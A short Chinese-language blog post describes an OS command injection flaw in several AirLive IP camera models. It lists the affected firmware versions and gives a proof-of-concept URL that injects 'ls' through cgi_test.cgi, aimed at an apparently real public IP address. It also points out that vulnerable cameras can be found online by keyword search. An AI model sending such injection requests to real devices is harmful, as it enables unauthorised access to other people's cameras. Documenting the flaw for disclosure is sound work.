文章目录

#影响范围:

1、AirLive BU-2015,固件版本1.03.18 16.06.2014
2、AirLive BU-3026,固件版本1.43 21.08.2014
3、AirLive MD-3025,固件版本1.81 21.08.2014
4、AirLive WL-2000CAM,固件版本LM.1.6.18 14.10.2011
5、AirLive POE-200CAM v2 ,固件版本LM.1.6.17.01

#命令注入漏洞测试

通过关键字可以在互联网上找到airlive的摄像机。通过以下链接测试系统命令注入漏洞,这里注入ls命令测试。

http://90.178.21.235:8080/cgi_test.cgi?write_tan&;ls&   

由于这里对write_tan参数的长度进行了限制,所以这个漏洞利用起来有一定的难度,这里仅仅是演示命令注入漏洞的效果。

#技术细节
参考airlive-multiple-products-os-command-injection

#参考资料
AirLive IP监控相机存在命令注入漏洞
airlive-multiple-products-os-command-injection

文章目录